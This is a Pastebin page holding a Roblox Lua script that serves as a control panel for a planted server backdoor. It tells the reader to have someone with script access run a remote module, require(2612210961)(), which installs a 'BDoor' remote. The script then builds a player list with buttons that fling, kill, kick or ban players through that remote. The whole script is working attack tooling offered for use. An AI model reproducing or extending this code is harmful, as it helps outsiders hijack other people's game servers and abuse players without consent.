Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --before running the script, do the script: require(2612210961)()
- errmsg = [[
- This server hasn't been backdoored :c
- if you know someone who has script access,
- get them to run the following code:
- require(2612210961)()
- After that you will be successfully able
- to use backdoor commands :)
- ]]
- if game:GetService("ReplicatedStorage"):FindFirstChild("BDoor") == nil then
- m = Instance.new("Message",workspace)
- m.Text = errmsg
- game:GetService("Debris"):AddItem(m,5)
- error(errmsg)
- end
- p = game:GetService("Players").LocalPlayer
- pg = p:FindFirstChildOfClass("PlayerGui")
- g = Instance.new("ScreenGui",pg)
- mf = Instance.new("Frame",g)
- mf.Size = UDim2.new(0,700,0,396)
- mf.Position = UDim2.new(0.082,0,0.171,0)
- sf = Instance.new("ScrollingFrame",mf)
- sf.ScrollBarImageColor3 = Color3.new(0,0,0)
- sf.Size = UDim2.new(0,700,0,231)
- sf.Position = UDim2.new(0,0,0,0)
- tf = Instance.new("Frame",sf)
- tf.Size = UDim2.new(0,700,0,120)
- tf.Position = UDim2.new(0,0,0,0)
- tf.Name = "Template"
- l = Instance.new("TextLabel",tf)
- l.Size = UDim2.new(0,398,0,100)
- l.Position = UDim2.new(0,0,0,0)
- l.TextScaled = true
- l.Text = "Shedletsky"
- l.Name = "PName"
- fling = Instance.new("TextButton",tf)
- fling.Name = "Fling"
- fling.Text = "Fling"
- fling.Size = UDim2.new(0,230,0,30)
- fling.Position = UDim2.new(0.569,0,0.752,0)
- kill = Instance.new("TextButton",tf)
- kill.Name = "Kill"
- kill.Text = "Kill"
- kill.Size = UDim2.new(0,115,0,41)
- kill.Position = UDim2.new(0.733,0,0.41,0)
- say = kill:Clone()
- say.Text = "Say"
- say.Position = UDim2.new(0.733,0,0,0)
- ban = say:Clone()
- ban.Text = "Ban"
- ban.Position = UDim2.new(0.569,0,0.41,0)
- kick = ban:Clone()
- kick.Text = "Kick"
- kick.Position = UDim2.new(0.569,0,0,0)
- tf.Visible = false
- ypos = 0
- function clearpframes()
- gc = sf:GetChildren()
- for b=1, #gc do
- if gc[b].Name ~= "Template" then
- gc[b]:Destroy()
- end
- end
- end
- function sendcmd(...)
- game:GetService("ReplicatedStorage").BDoor.Action:FireServer(...)
- end
- while true do
- wait(3)
- ypos = 0
- clearpframes()
- gc = game:GetService("Players"):GetChildren()
- for q=1, #gc do
- pf = tf:Clone()
- pf.Visible = true
- pf.Parent = tf.Parent
- pf.Position = UDim2.new(0,0,0,ypos)
- pf.PName.Text = gc[q].Name
- pf.Fling.MouseButton1Click:connect(function()
- sendcmd("fling",pf.PName.Text)
- end)
- pf.Kill.MouseButton1Click:connect(function()
- sendcmd("kill",pf.PName.Text)
- end)
- pf.Say.MouseButton1Click:connect(function()
- sendcmd("say",pf.PName.Text)
- end)
- pf.Ban.MouseButton1Click:connect(function()
- sendcmd("ban",pf.PName.Text)
- end)
- pf.Kick.MouseButton1Click:connect(function()
- sendcmd("kick",pf.PName.Text)
- end)
- ypos = ypos+tf.Size.Y.Offset
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement